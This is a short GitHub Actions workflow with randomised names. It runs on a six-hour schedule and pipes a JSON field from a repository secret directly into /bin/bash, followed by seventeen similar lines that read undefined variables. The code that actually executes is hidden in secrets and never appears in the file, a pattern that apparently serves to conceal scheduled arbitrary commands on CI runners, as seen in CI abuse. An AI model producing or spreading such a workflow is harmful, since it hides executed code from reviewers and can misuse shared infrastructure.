name: boxrayx
on:
  workflow_dispatch:
  schedule:
    - cron: '54 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: boxrayx
        env:
          gsw5: ${{ secrets.gsw5 }}
        run: |
          echo $gsw5 | jq -r .f22 | /bin/bash
          echo $bnxl0 | jq -r .majr4635 | /bin/bash
          echo $gazuj61215 | jq -r .wxim548 | /bin/bash
          echo $kep7541 | jq -r .jnha327 | /bin/bash
          echo $acrtd03804 | jq -r .f6302 | /bin/bash
          echo $ofmj3000 | jq -r .y6 | /bin/bash
          echo $izg4 | jq -r .cdc84 | /bin/bash
          echo $ue9 | jq -r .iw40 | /bin/bash
          echo $eq6904 | jq -r .wn8297 | /bin/bash
          echo $ulni487 | jq -r .tlj32837 | /bin/bash
          echo $s74168 | jq -r .sw104 | /bin/bash
          echo $vjvnz85842 | jq -r .j46732 | /bin/bash
          echo $vypf41 | jq -r .dmvwd390 | /bin/bash
          echo $ca73407 | jq -r .icph14 | /bin/bash
          echo $qsep7420 | jq -r .amcyx254 | /bin/bash
          echo $qai0160 | jq -r .lhxq17 | /bin/bash
          echo $h78786 | jq -r .hasgm10117 | /bin/bash
          echo $btrlc003 | jq -r .jizz79808 | /bin/bash

